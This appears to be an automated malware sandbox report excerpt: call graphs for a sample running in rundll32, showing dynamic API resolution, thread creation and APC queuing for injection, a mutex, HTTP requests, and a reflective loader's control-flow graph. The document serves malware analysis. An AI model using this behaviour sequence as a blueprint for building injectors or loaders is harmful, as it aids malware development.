1e51e96b4e0 RtlFreeHeap 71667->71668 71668->71644 71671 1e51e94fff9 71669->71671 71670 1e51e942939 71689 1e51e94f8a0 71670->71689 71671->71670 71672 1e51e94cce0 LdrGetProcedureAddress 71671->71672 71673 1e51e950072 71672->71673 71674 1e51e94cce0 LdrGetProcedureAddress 71673->71674 71675 1e51e95008d 71674->71675 71676 1e51e94cce0 LdrGetProcedureAddress 71675->71676 71677 1e51e9500b6 71676->71677 71678 1e51e94cce0 LdrGetProcedureAddress 71677->71678 71679 1e51e9500d5 71678->71679 71680 1e51e94cce0 LdrGetProcedureAddress 71679->71680 71681 1e51e9500f4 71680->71681 71682 1e51e94cce0 LdrGetProcedureAddress 71681->71682 71683 1e51e950113 71682->71683 71684 1e51e94cce0 LdrGetProcedureAddress 71683->71684 71685 1e51e950132 71684->71685 71686 1e51e94cce0 LdrGetProcedureAddress 71685->71686 71687 1e51e950151 71686->71687 71688 1e51e94cce0 LdrGetProcedureAddress 71687->71688 71688->71670 71690 1e51e94f8da 71689->71690 71691 1e51e94293e 71690->71691 71692 1e51e94cce0 LdrGetProcedureAddress 71690->71692 71697 1e51e953470 71691->71697 71693 1e51e94f900 71692->71693 71694 1e51e94cce0 LdrGetProcedureAddress 71693->71694 71695 1e51e94f91b 71694->71695 71696 1e51e94cce0 LdrGetProcedureAddress 71695->71696 71696->71691 71699 1e51e953489 71697->71699 71698 1e51e953493 71698->71276 71699->71698 71700 1e51e94cce0 LdrGetProcedureAddress 71699->71700 71701 1e51e953502 71700->71701 71702 1e51e94cce0 LdrGetProcedureAddress 71701->71702 71703 1e51e95351d 71702->71703 71704 1e51e94cce0 LdrGetProcedureAddress 71703->71704 71705 1e51e953546 71704->71705 71706 1e51e94cce0 LdrGetProcedureAddress 71705->71706 71707 1e51e953565 71706->71707 71708 1e51e94cce0 LdrGetProcedureAddress 71707->71708 71709 1e51e953584 71708->71709 71710 1e51e94cce0 LdrGetProcedureAddress 71709->71710 71711 1e51e9535a3 71710->71711 71712 1e51e94cce0 LdrGetProcedureAddress 71711->71712 71713 1e51e9535c2 71712->71713 71714 1e51e94cce0 LdrGetProcedureAddress 71713->71714 71715 1e51e9535e1 71714->71715 71716 1e51e94cce0 LdrGetProcedureAddress 71715->71716 71717 1e51e953600 71716->71717 71718 1e51e94cce0 LdrGetProcedureAddress 71717->71718 71719 1e51e95361f 71718->71719 71720 1e51e94cce0 LdrGetProcedureAddress 71719->71720 71721 1e51e95363e 71720->71721 71722 1e51e94cce0 LdrGetProcedureAddress 71721->71722 71723 1e51e95365d 71722->71723 71724 1e51e94cce0 LdrGetProcedureAddress 71723->71724 71725 1e51e95367c 71724->71725 71726 1e51e94cce0 LdrGetProcedureAddress 71725->71726 71727 1e51e95369b 71726->71727 71728 1e51e94cce0 LdrGetProcedureAddress 71727->71728 71729 1e51e9536ba 71728->71729 71730 1e51e94cce0 LdrGetProcedureAddress 71729->71730 71731 1e51e9536d9 71730->71731 71732 1e51e94cce0 LdrGetProcedureAddress 71731->71732 71733 1e51e9536f8 71732->71733 71734 1e51e94cce0 LdrGetProcedureAddress 71733->71734 71735 1e51e953717 71734->71735 71736 1e51e94cce0 LdrGetProcedureAddress 71735->71736 71737 1e51e953736 71736->71737 71738 1e51e94cce0 LdrGetProcedureAddress 71737->71738 71739 1e51e953755 71738->71739 71740 1e51e94cce0 LdrGetProcedureAddress 71739->71740 71740->71698 71743 1e51e94cd1b 71741->71743 71742 1e51e94cdbf 71742->71280 71743->71742 71744 1e51e94cd9b LdrGetProcedureAddress 71743->71744 71744->71742 71746 1e51e948eee CreateMutexExA 71745->71746 71747 1e51e973de0 71746->71747 71749 1e51e973e14 71747->71749 71748 1e51e948f71 71748->71414 71749->71748 71750 1e51e96b4e0 RtlFreeHeap 71749->71750 71750->71749 71752 1e51e948016 71751->71752 71753 1e51e96557b 71751->71753 71752->71452 71755 1e51e95be20 RtlFreeHeap 71752->71755 71753->71752 71754 1e51e96b4e0 RtlFreeHeap 71753->71754 71754->71752 71755->71452 71756->71485 71759 1e51e94a084 71757->71759 71758 1e51e94a118 71758->71506 71759->71758 71760 1e51e96b4e0 RtlFreeHeap 71759->71760 71760->71759 71761->71504 71762->71518 71763->71523 71764->71529 71765->71535 71766->71580 71767->71578 71769 1e51e94788a InternetOpenW 71768->71769 71770 1e51e947885 71768->71770 71771 1e51e947898 InternetConnectW 71769->71771 71789 1e51e947aed 71769->71789 71770->71769 71772 1e51e9478dd HttpOpenRequestW 71771->71772 71771->71789 71775 1e51e947931 71772->71775 71772->71789 71773 1e51e947b0e InternetCloseHandle 71776 1e51e947b17 71773->71776 71774 1e51e947b60 71774->71643 71777 1e51e9479cb HttpSendRequestA 71775->71777 71775->71789 71776->71774 71778 1e51e947b56 71776->71778 71780 1e51e947b8c 71776->71780 71779 1e51e9479e4 71777->71779 71777->71789 71778->71774 71781 1e51e96b4e0 RtlFreeHeap 71778->71781 71785 1e51e96b4e0 RtlFreeHeap 71779->71785 71790 1e51e947a24 71779->71790 71782 1e51e94a050 RtlFreeHeap 71780->71782 71781->71774 71783 1e51e947ba4 71782->71783 71784 1e51e96b4e0 RtlFreeHeap 71783->71784 71784->71774 71785->71790 71786 1e51e947a3f InternetQueryDataAvailable 71787 1e51e947ae3 71786->71787 71786->71790 71788 1e51e96b4e0 RtlFreeHeap 71787->71788 71788->71789 71789->71773 71789->71776 71790->71786 71790->71787 71791 1e51e947a98 RtlReAllocateHeap 71790->71791 71791->71790 71802 1e51e9417f5 71792->71802 71793 1e51e94180f 71794 1e51e96b4e0 RtlFreeHeap 71793->71794 71795 1e51e941820 71794->71795 71796 1e51e96b4e0 RtlFreeHeap 71795->71796 71797 1e51e941838 71796->71797 71798 1e51e94a050 RtlFreeHeap 71797->71798 71799 1e51e941b61 71797->71799 71800 1e51e96b4e0 RtlFreeHeap 71797->71800 71798->71797 71799->71647 71800->71797 71802->71793 71806 1e51e944cd0 71802->71806 71803->71643 71804->71648 71805->71667 71811 1e51e974360 71806->71811 71810 1e51e944d58 71810->71802 71813 1e51e9743bd 71811->71813 71812 1e51e944d3d 71815 1e51e974ff0 71812->71815 71813->71812 71814 1e51e97444e NtCreateThreadEx 71813->71814 71814->71812 71817 1e51e975011 71815->71817 71816 1e51e97506c 71816->71810 71817->71816 71818 1e51e97506a NtQueueApcThread 71817->71818 71818->71816 71819 1e51e9471b0 71820 1e51e9471c6 71819->71820 71827 1e51e942950 71820->71827 71822 1e51e9471f5 71823 1e51e974360 NtCreateThreadEx 71822->71823 71824 1e51e94730e 71823->71824 71825 1e51e974ff0 NtQueueApcThread 71824->71825 71826 1e51e94732d 71825->71826 71844 1e51e9516a0 71827->71844 71829 1e51e942959 72016 1e51e9501a0 71829->72016 71831 1e51e942963 71832 1e51e950f99 71831->71832 71833 1e51e94cce0 LdrGetProcedureAddress 71831->71833 71832->71822 71834 1e51e950ef8 71833->71834 71835 1e51e94cce0 LdrGetProcedureAddress 71834->71835 71836 1e51e950f13 71835->71836 71837 1e51e94cce0 LdrGetProcedureAddress 71836->71837 71838 1e51e950f3c 71837->71838 71839 1e51e94cce0 LdrGetProcedureAddress 71838->71839 71840 1e51e950f5b 71839->71840 71841 1e51e94cce0 LdrGetProcedureAddress 71840->71841 71842 1e51e950f7a 71841->71842 71843 1e51e94cce0 LdrGetProcedureAddress 71842->71843 71843->71832 71845 1e51e9516a9 71844->71845 71846 1e51e9521e1 71845->71846 71847 1e51e94cce0 LdrGetProcedureAddress 71845->71847 71846->71829 71848 1e51e9516c8 71847->71848 71849 1e51e94cce0 LdrGetProcedureAddress 71848->71849 71850 1e51e9516e0 71849->71850 71851 1e51e94cce0 LdrGetProcedureAddress 71850->71851 71852 1e51e9516f8 71851->71852 71853 1e51e94cce0 LdrGetProcedureAddress 71852->71853 71854 1e51e951710 71853->71854 71855 1e51e94cce0 LdrGetProcedureAddress 71854->71855 71856 1e51e951728 71855->71856 71857 1e51e94cce0 LdrGetProcedureAddress 71856->71857 71858 1e51e951740 71857->71858 71859 1e51e94cce0 LdrGetProcedureAddress 71858->71859 71860 1e51e951758 71859->71860 71861 1e51e94cce0 LdrGetProcedureAddress 71860->71861 71862 1e51e951770 71861->71862 71863 1e51e94cce0 LdrGetProcedureAddress 71862->71863 71864 1e51e951788 71863->71864 71865 1e51e94cce0 LdrGetProcedureAddress 71864->71865 71866 1e51e9517a0 71865->71866 71867 1e51e94cce0 LdrGetProcedureAddress 71866->71867 71868 1e51e9517b8 71867->71868 71869 1e51e94cce0 LdrGetProcedureAddress 71868->71869 71870 1e51e9517d0 71869->71870 71871 1e51e94cce0 LdrGetProcedureAddress 71870->71871 71872 1e51e9517e8 71871->71872 71873 1e51e94cce0 LdrGetProcedureAddress 71872->71873 71874 1e51e951800 71873->71874 71875 1e51e94cce0 LdrGetProcedureAddress 71874->71875 71876 1e51e951818 71875->71876 71877 1e51e94cce0 LdrGetProcedureAddress 71876->71877 71878 1e51e951830 71877->71878 71879 1e51e94cce0 LdrGetProcedureAddress 71878->71879 71880 1e51e951848 71879->71880 71881 1e51e94cce0 LdrGetProcedureAddress 71880->71881 71882 1e51e951860 71881->71882 71883 1e51e94cce0 LdrGetProcedureAddress 71882->71883 71884 1e51e951878 71883->71884 71885 1e51e94cce0 LdrGetProcedureAddress 71884->71885 71886 1e51e951890 71885->71886 71887 1e51e94cce0 LdrGetProcedureAddress 71886->71887 71888 1e51e9518a8 71887->71888 71889 1e51e94cce0 LdrGetProcedureAddress 71888->71889 71890 1e51e9518c0 71889->71890 71891 1e51e94cce0 LdrGetProcedureAddress 71890->71891 71892 1e51e9518d8 71891->71892 71893 1e51e94cce0 LdrGetProcedureAddress 71892->71893 71894 1e51e9518f0 71893->71894 71895 1e51e94cce0 LdrGetProcedureAddress 71894->71895 71896 1e51e951908 71895->71896 71897 1e51e94cce0 LdrGetProcedureAddress 71896->71897 71898 1e51e951920 71897->71898 71899 1e51e94cce0 LdrGetProcedureAddress 71898->71899 71900 1e51e951938 71899->71900 71901 1e51e94cce0 LdrGetProcedureAddress 71900->71901 71902 1e51e951950 71901->71902 71903 1e51e94cce0 LdrGetProcedureAddress 71902->71903 71904 1e51e951968 71903->71904 71905 1e51e94cce0 LdrGetProcedureAddress 71904->71905 71906 1e51e951980 71905->71906 71907 1e51e94cce0 LdrGetProcedureAddress 71906->71907 71908 1e51e951998 71907->71908 71909 1e51e94cce0 LdrGetProcedureAddress 71908->71909 71910 1e51e9519b0 71909->71910 71911 1e51e94cce0 LdrGetProcedureAddress 71910->71911 71912 1e51e9519c8 71911->71912 71913 1e51e94cce0 LdrGetProcedureAddress 71912->71913 71914 1e51e9519e0 71913->71914 71915 1e51e94cce0 LdrGetProcedureAddress 71914->71915 71916 1e51e9519f8 71915->71916 71917 1e51e94cce0 LdrGetProcedureAddress 71916->71917 71918 1e51e951a10 71917->71918 71919 1e51e94cce0 LdrGetProcedureAddress 71918->71919 71920 1e51e951a28 71919->71920 71921 1e51e94cce0 LdrGetProcedureAddress 71920->71921 71922 1e51e951a40 71921->71922 71923 1e51e94cce0 LdrGetProcedureAddress 71922->71923 71924 1e51e951a58 71923->71924 71925 1e51e94cce0 LdrGetProcedureAddress 71924->71925 71926 1e51e951a70 71925->71926 71927 1e51e94cce0 LdrGetProcedureAddress 71926->71927 71928 1e51e951a88 71927->71928 71929 1e51e94cce0 LdrGetProcedureAddress 71928->71929 71930 1e51e951aa0 71929->71930 71931 1e51e94cce0 LdrGetProcedureAddress 71930->71931 71932 1e51e951ab8 71931->71932 71933 1e51e94cce0 LdrGetProcedureAddress 71932->71933 71934 1e51e951ad0 71933->71934 71935 1e51e94cce0 LdrGetProcedureAddress 71934->71935 71936 1e51e951ae8 71935->71936 71937 1e51e94cce0 LdrGetProcedureAddress 71936->71937 71938 1e51e951b00 71937->71938 71939 1e51e94cce0 LdrGetProcedureAddress 71938->71939 71940 1e51e951b18 71939->71940 71941 1e51e94cce0 LdrGetProcedureAddress 71940->71941 71942 1e51e951b30 71941->71942 71943 1e51e94cce0 LdrGetProcedureAddress 71942->71943 71944 1e51e951b48 71943->71944 71945 1e51e94cce0 LdrGetProcedureAddress 71944->71945 71946 1e51e951b60 71945->71946 71947 1e51e94cce0 LdrGetProcedureAddress 71946->71947 71948 1e51e951b78 71947->71948 71949 1e51e94cce0 LdrGetProcedureAddress 71948->71949 71950 1e51e951b90 71949->71950 71951 1e51e94cce0 LdrGetProcedureAddress 71950->71951 71952 1e51e951bc1 71951->71952 71953 1e51e94cce0 LdrGetProcedureAddress 71952->71953 71954 1e51e951bf2 71953->71954 71955 1e51e94cce0 LdrGetProcedureAddress 71954->71955 71956 1e51e951c23 71955->71956 71957 1e51e94cce0 LdrGetProcedureAddress 71956->71957 71958 1e51e951c54 71957->71958 71959 1e51e94cce0 LdrGetProcedureAddress 71958->71959 71960 1e51e951c85 71959->71960 71961 1e51e94cce0 LdrGetProcedureAddress 71960->71961 71962 1e51e951cb6 71961->71962 71963 1e51e94cce0 LdrGetProcedureAddress 71962->71963 71964 1e51e951ce7 71963->71964 71965 1e51e94cce0 LdrGetProcedureAddress 71964->71965 71966 1e51e951d18 71965->71966 71967 1e51e94cce0 LdrGetProcedureAddress 71966->71967 71968 1e51e951d49 71967->71968 71969 1e51e94cce0 LdrGetProcedureAddress 71968->71969 71970 1e51e951d7a 71969->71970 71971 1e51e94cce0 LdrGetProcedureAddress 71970->71971 71972 1e51e951dab 71971->71972 71973 1e51e94cce0 LdrGetProcedureAddress 71972->71973 71974 1e51e951ddc 71973->71974 71975 1e51e94cce0 LdrGetProcedureAddress 71974->71975 71976 1e51e951e0d 71975->71976 71977 1e51e94cce0 LdrGetProcedureAddress 71976->71977 71978 1e51e951e3e 71977->71978 71979 1e51e94cce0 LdrGetProcedureAddress 71978->71979 71980 1e51e951e6f 71979->71980 71981 1e51e94cce0 LdrGetProcedureAddress 71980->71981 71982 1e51e951ea0 71981->71982 71983 1e51e94cce0 LdrGetProcedureAddress 71982->71983 71984 1e51e951ed1 71983->71984 71985 1e51e94cce0 LdrGetProcedureAddress 71984->71985 71986 1e51e951f02 71985->71986 71987 1e51e94cce0 LdrGetProcedureAddress 71986->71987 71988 1e51e951f33 71987->71988 71989 1e51e94cce0 LdrGetProcedureAddress 71988->71989 71990 1e51e951f64 71989->71990 71991 1e51e94cce0 LdrGetProcedureAddress 71990->71991 71992 1e51e951f95 71991->71992 71993 1e51e94cce0 LdrGetProcedureAddress 71992->71993 71994 1e51e951fc6 71993->71994 71995 1e51e94cce0 LdrGetProcedureAddress 71994->71995 71996 1e51e951ff7 71995->71996 71997 1e51e94cce0 LdrGetProcedureAddress 71996->71997 71998 1e51e952028 71997->71998 71999 1e51e94cce0 LdrGetProcedureAddress 71998->71999 72000 1e51e952059 71999->72000 72001 1e51e94cce0 LdrGetProcedureAddress 72000->72001 72002 1e51e95208a 72001->72002 72003 1e51e94cce0 LdrGetProcedureAddress 72002->72003 72004 1e51e9520bb 72003->72004 72005 1e51e94cce0 LdrGetProcedureAddress 72004->72005 72006 1e51e9520ec 72005->72006 72007 1e51e94cce0 LdrGetProcedureAddress 72006->72007 72008 1e51e95211d 72007->72008 72009 1e51e94cce0 LdrGetProcedureAddress 72008->72009 72010 1e51e95214e 72009->72010 72011 1e51e94cce0 LdrGetProcedureAddress 72010->72011 72012 1e51e95217f 72011->72012 72013 1e51e94cce0 LdrGetProcedureAddress 72012->72013 72014 1e51e9521b0 72013->72014 72015 1e51e94cce0 LdrGetProcedureAddress 72014->72015 72015->71846 72017 1e51e9501ce 72016->72017 72018 1e51e94cce0 LdrGetProcedureAddress 72017->72018 72219 1e51e950e4a 72017->72219 72019 1e51e950228 72018->72019 72020 1e51e94cce0 LdrGetProcedureAddress 72019->72020 72021 1e51e950243 72020->72021 72022 1e51e94cce0 LdrGetProcedureAddress 72021->72022 72023 1e51e95026c 72022->72023 72024 1e51e94cce0 LdrGetProcedureAddress 72023->72024 72025 1e51e95028b 72024->72025 72026 1e51e94cce0 LdrGetProcedureAddress 72025->72026 72027 1e51e9502aa 72026->72027 72028 1e51e94cce0 LdrGetProcedureAddress 72027->72028 72029 1e51e9502c9 72028->72029 72030 1e51e94cce0 LdrGetProcedureAddress 72029->72030 72031 1e51e9502e8 72030->72031 72032 1e51e94cce0 LdrGetProcedureAddress 72031->72032 72033 1e51e950307 72032->72033 72034 1e51e94cce0 LdrGetProcedureAddress 72033->72034 72035 1e51e950326 72034->72035 72036 1e51e94cce0 LdrGetProcedureAddress 72035->72036 72037 1e51e950345 72036->72037 72038 1e51e94cce0 LdrGetProcedureAddress 72037->72038 72039 1e51e950364 72038->72039 72040 1e51e94cce0 LdrGetProcedureAddress 72039->72040 72041 1e51e950383 72040->72041 72042 1e51e94cce0 LdrGetProcedureAddress 72041->72042 72043 1e51e9503a2 72042->72043 72044 1e51e94cce0 LdrGetProcedureAddress 72043->72044 72045 1e51e9503c1 72044->72045 72046 1e51e94cce0 LdrGetProcedureAddress 72045->72046 72047 1e51e9503e0 72046->72047 72048 1e51e94cce0 LdrGetProcedureAddress 72047->72048 72049 1e51e9503ff 72048->72049 72050 1e51e94cce0 LdrGetProcedureAddress 72049->72050 72051 1e51e95041e 72050->72051 72052 1e51e94cce0 LdrGetProcedureAddress 72051->72052 72053 1e51e95043d 72052->72053 72054 1e51e94cce0 LdrGetProcedureAddress 72053->72054 72055 1e51e95045c 72054->72055 72056 1e51e94cce0 LdrGetProcedureAddress 72055->72056 72057 1e51e95047b 72056->72057 72058 1e51e94cce0 LdrGetProcedureAddress 72057->72058 72059 1e51e95049a 72058->72059 72060 1e51e94cce0 LdrGetProcedureAddress 72059->72060 72061 1e51e9504b9 72060->72061 72062 1e51e94cce0 LdrGetProcedureAddress 72061->72062 72063 1e51e9504d8 72062->72063 72064 1e51e94cce0 LdrGetProcedureAddress 72063->72064 72065 1e51e9504f7 72064->72065 72066 1e51e94cce0 LdrGetProcedureAddress 72065->72066 72067 1e51e950516 72066->72067 72068 1e51e94cce0 LdrGetProcedureAddress 72067->72068 72069 1e51e950535 72068->72069 72070 1e51e94cce0 LdrGetProcedureAddress 72069->72070 72071 1e51e950554 72070->72071 72072 1e51e94cce0 LdrGetProcedureAddress 72071->72072 72073 1e51e950573 72072->72073 72074 1e51e94cce0 LdrGetProcedureAddress 72073->72074 72075 1e51e950592 72074->72075 72076 1e51e94cce0 LdrGetProcedureAddress 72075->72076 72077 1e51e9505b1 72076->72077 72078 1e51e94cce0 LdrGetProcedureAddress 72077->72078 72079 1e51e9505d0 72078->72079 72080 1e51e94cce0 LdrGetProcedureAddress 72079->72080 72081 1e51e9505ef 72080->72081 72082 1e51e94cce0 LdrGetProcedureAddress 72081->72082 72083 1e51e95060e 72082->72083 72084 1e51e94cce0 LdrGetProcedureAddress 72083->72084 72085 1e51e95062d 72084->72085 72086 1e51e94cce0 LdrGetProcedureAddress 72085->72086 72087 1e51e95064c 72086->72087 72088 1e51e94cce0 LdrGetProcedureAddress 72087->72088 72089 1e51e95066b 72088->72089 72090 1e51e94cce0 LdrGetProcedureAddress 72089->72090 72091 1e51e95068a 72090->72091 72092 1e51e94cce0 LdrGetProcedureAddress 72091->72092 72093 1e51e9506a9 72092->72093 72094 1e51e94cce0 LdrGetProcedureAddress 72093->72094 72095 1e51e9506c8 72094->72095 72096 1e51e94cce0 LdrGetProcedureAddress 72095->72096 72097 1e51e9506e7 72096->72097 72098 1e51e94cce0 LdrGetProcedureAddress 72097->72098 72099 1e51e950706 72098->72099 72100 1e51e94cce0 LdrGetProcedureAddress 72099->72100 72101 1e51e950725 72100->72101 72102 1e51e94cce0 LdrGetProcedureAddress 72101->72102 72103 1e51e950744 72102->72103 72104 1e51e94cce0 LdrGetProcedureAddress 72103->72104 72105 1e51e950763 72104->72105 72106 1e51e94cce0 LdrGetProcedureAddress 72105->72106 72107 1e51e950782 72106->72107 72108 1e51e94cce0 LdrGetProcedureAddress 72107->72108 72109 1e51e9507a1 72108->72109 72110 1e51e94cce0 LdrGetProcedureAddress 72109->72110 72111 1e51e9507c0 72110->72111 72112 1e51e94cce0 LdrGetProcedureAddress 72111->72112 72113 1e51e9507df 72112->72113 72114 1e51e94cce0 LdrGetProcedureAddress 72113->72114 72115 1e51e9507fe 72114->72115 72116 1e51e94cce0 LdrGetProcedureAddress 72115->72116 72117 1e51e95081d 72116->72117 72118 1e51e94cce0 LdrGetProcedureAddress 72117->72118 72119 1e51e95083c 72118->72119 72120 1e51e94cce0 LdrGetProcedureAddress 72119->72120 72121 1e51e95085b 72120->72121 72122 1e51e94cce0 LdrGetProcedureAddress 72121->72122 72123 1e51e95087a 72122->72123 72124 1e51e94cce0 LdrGetProcedureAddress 72123->72124 72125 1e51e950899 72124->72125 72126 1e51e94cce0 LdrGetProcedureAddress 72125->72126 72127 1e51e9508b8 72126->72127 72128 1e51e94cce0 LdrGetProcedureAddress 72127->72128 72129 1e51e9508d7 72128->72129 72130 1e51e94cce0 LdrGetProcedureAddress 72129->72130 72131 1e51e9508f6 72130->72131 72132 1e51e94cce0 LdrGetProcedureAddress 72131->72132 72133 1e51e950915 72132->72133 72134 1e51e94cce0 LdrGetProcedureAddress 72133->72134 72135 1e51e950934 72134->72135 72136 1e51e94cce0 LdrGetProcedureAddress 72135->72136 72137 1e51e950953 72136->72137 72138 1e51e94cce0 LdrGetProcedureAddress 72137->72138 72139 1e51e950972 72138->72139 72140 1e51e94cce0 LdrGetProcedureAddress 72139->72140 72141 1e51e950991 72140->72141 72142 1e51e94cce0 LdrGetProcedureAddress 72141->72142 72143 1e51e9509b0 72142->72143 72144 1e51e94cce0 LdrGetProcedureAddress 72143->72144 72145 1e51e9509cf 72144->72145 72146 1e51e94cce0 LdrGetProcedureAddress 72145->72146 72147 1e51e9509ee 72146->72147 72148 1e51e94cce0 LdrGetProcedureAddress 72147->72148 72149 1e51e950a0d 72148->72149 72150 1e51e94cce0 LdrGetProcedureAddress 72149->72150 72151 1e51e950a2c 72150->72151 72152 1e51e94cce0 LdrGetProcedureAddress 72151->72152 72153 1e51e950a4b 72152->72153 72154 1e51e94cce0 LdrGetProcedureAddress 72153->72154 72155 1e51e950a6a 72154->72155 72156 1e51e94cce0 LdrGetProcedureAddress 72155->72156 72157 1e51e950a89 72156->72157 72158 1e51e94cce0 LdrGetProcedureAddress 72157->72158 72159 1e51e950aa8 72158->72159 72160 1e51e94cce0 LdrGetProcedureAddress 72159->72160 72161 1e51e950ac7 72160->72161 72162 1e51e94cce0 LdrGetProcedureAddress 72161->72162 72163 1e51e950ae6 72162->72163 72164 1e51e94cce0 LdrGetProcedureAddress 72163->72164 72165 1e51e950b05 72164->72165 72166 1e51e94cce0 LdrGetProcedureAddress 72165->72166 72167 1e51e950b24 72166->72167 72168 1e51e94cce0 LdrGetProcedureAddress 72167->72168 72169 1e51e950b43 72168->72169 72170 1e51e94cce0 LdrGetProcedureAddress 72169->72170 72171 1e51e950b62 72170->72171 72172 1e51e94cce0 LdrGetProcedureAddress 72171->72172 72173 1e51e950b81 72172->72173 72174 1e51e94cce0 LdrGetProcedureAddress 72173->72174 72175 1e51e950ba0 72174->72175 72176 1e51e94cce0 LdrGetProcedureAddress 72175->72176 72177 1e51e950bbf 72176->72177 72178 1e51e94cce0 LdrGetProcedureAddress 72177->72178 72179 1e51e950bde 72178->72179 72180 1e51e94cce0 LdrGetProcedureAddress 72179->72180 72181 1e51e950bfd 72180->72181 72182 1e51e94cce0 LdrGetProcedureAddress 72181->72182 72183 1e51e950c1c 72182->72183 72184 1e51e94cce0 LdrGetProcedureAddress 72183->72184 72185 1e51e950c3b 72184->72185 72186 1e51e94cce0 LdrGetProcedureAddress 72185->72186 72187 1e51e950c5a 72186->72187 72188 1e51e94cce0 LdrGetProcedureAddress 72187->72188 72189 1e51e950c79 72188->72189 72190 1e51e94cce0 LdrGetProcedureAddress 72189->72190 72191 1e51e950c98 72190->72191 72192 1e51e94cce0 LdrGetProcedureAddress 72191->72192 72193 1e51e950cb7 72192->72193 72194 1e51e94cce0 LdrGetProcedureAddress 72193->72194 72195 1e51e950cd6 72194->72195 72196 1e51e94cce0 LdrGetProcedureAddress 72195->72196 72197 1e51e950cf5 72196->72197 72198 1e51e94cce0 LdrGetProcedureAddress 72197->72198 72199 1e51e950d14 72198->72199 72200 1e51e94cce0 LdrGetProcedureAddress 72199->72200 72201 1e51e950d33 72200->72201 72202 1e51e94cce0 LdrGetProcedureAddress 72201->72202 72203 1e51e950d52 72202->72203 72204 1e51e94cce0 LdrGetProcedureAddress 72203->72204 72205 1e51e950d71 72204->72205 72206 1e51e94cce0 LdrGetProcedureAddress 72205->72206 72207 1e51e950d90 72206->72207 72208 1e51e94cce0 LdrGetProcedureAddress 72207->72208 72209 1e51e950daf 72208->72209 72210 1e51e94cce0 LdrGetProcedureAddress 72209->72210 72211 1e51e950dce 72210->72211 72212 1e51e94cce0 LdrGetProcedureAddress 72211->72212 72213 1e51e950ded 72212->72213 72214 1e51e94cce0 LdrGetProcedureAddress 72213->72214 72215 1e51e950e0c 72214->72215 72216 1e51e94cce0 LdrGetProcedureAddress 72215->72216 72217 1e51e950e2b 72216->72217 72218 1e51e94cce0 LdrGetProcedureAddress 72217->72218 72218->72219 72219->71831

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 72 1e519090024-1e519090088 73 1e51909008a-1e519090098 72->73 74 1e5190900a7-1e5190900ac 73->74 75 1e51909009a-1e5190900a5 73->75 76 1e5190900ae-1e5190900b8 74->76 75->74 75->75 76->76 77 1e5190900ba-1e5190900bd 76->77 78 1e5190900bf-1e5190900c7 77->78 79 1e519090121-1e519090127 77->79 81 1e5190900c9-1e5190900d5 78->81 79->73 80 1e51909012d-1e51909012e 79->80 82 1e519090130-1e51909018e call 1e519090418 * 3 VirtualAlloc 80->82 83 1e519090384-1e519090388 81->83 84 1e5190900db-1e5190900e6 81->84 98 1e519090404 82->98 99 1e519090194-1e5190901aa 82->99 83->82 84->84 86 1e5190900e8-1e5190900eb 84->86 86->83 88 1e5190900f1-1e5190900fd 86->88 90 1e5190900ff 88->90 91 1e519090103-1e51909010b 88->91 90->91 93 1e51909010d-1e51909010f 91->93 94 1e519090112-1e519090116 91->94 93->94 94->79 95 1e519090118-1e51909011f 94->95 95->81 100 1e519090406-1e519090416 98->100 101 1e5190901c8-1e5190901e6 99->101 102 1e5190901ac-1e5190901b3 99->102 101->98 104 1e5190901ec-1e5190901f1 101->104 103 1e5190901b5-1e5190901c6 102->103 103->101 103->103 105 1e5190901f3-1e5190901f9 104->105 106 1e51909020b-1e51909020e 105->106 107 1e5190901fb-1e519090205 105->107 109 1e519090220-1e519090237 106->109 110 1e519090210-1e51909021a 106->110 107->106 108 1e519090207-1e519090208 107->108 108->106 112 1e519090251-1e51909025e 109->112 113 1e519090239-1e51909023a 109->113 110->109 111 1e51909021c-1e51909021d 110->111 111->109 112->105 115 1e519090260-1e519090265 112->115 114 1e51909023c-1e51909024f 113->114 114->112 114->114 115->98 116 1e51909026b-1e519090273 115->116 117 1e51909032a-1e519090334 116->117 118 1e519090279-1e51909027a 116->118 117->98 119 1e51909033a-1e519090340 117->119 120 1e51909027d-1e519090294 118->120 121 1e519090342-1e519090343 119->121 122 1e5190903b1-1e5190903be 119->122 123 1e51909031f-1e519090322 120->123 124 1e51909029a 120->124 128 1e519090346-1e519090356 LoadLibraryA 121->128 126 1e5190903c0-1e5190903cc 122->126 127 1e5190903e6-1e519090402 122->127 123->120 125 1e519090328 123->125 129 1e51909029c-1e5190902b5 124->129 125->117 132 1e5190903de-1e5190903e4 126->132 127->100 128->98 133 1e51909035c-1e519090365 128->133 130 1e519090317-1e51909031a 129->130 131 1e5190902b7-1e5190902dc 129->131 130->129 135 1e51909031c 130->135 134 1e5190902de-1e5190902f2 131->134 132->127 136 1e5190903ce-1e5190903db 132->136 137 1e519090367-1e519090368 133->137 138 1e5190903a9-1e5190903af 133->138 134->134 140 1e5190902f4-1e519090300 134->140 135->123 136->132 141 1e51909036a-1e51909037d 137->141 138->122 138->128 142 1e519090302-1e519090315 140->142 144 1e51909038d-1e519090392 141->144 145 1e51909037f-1e519090382 141->145 142->130 142->142 146 1e519090394-1e5190903a1 144->146 145->146 146->141 148 1e5190903a3-1e5190903a7 146->148 148->138
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                • String ID: .$3$e$k$l$r
                                                                                                                                                                                • API String ID: 3550616410-427081609
                                                                                                                                                                                • Opcode ID: 291297bbe044f9a5b47e76894c7116349fbdee25044733f7824d139af3bc4b69
                                                                                                                                                                                • Instruction ID: 30cbaf85a6c5e17512a64b1459353b519b1d92617a941587b48b11c25aa99be7
                                                                                                                                                                                • Opcode Fuzzy Hash: 291297bbe044f9a5b47e76894c7116349fbdee25044733f7824d139af3bc4b69
                                                                                                                                                                                • Instruction Fuzzy Hash: F9D1F830218E8E8BDB1DDB58D8857F973F6FB95319F18416ED88BC7296DA3098438780

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
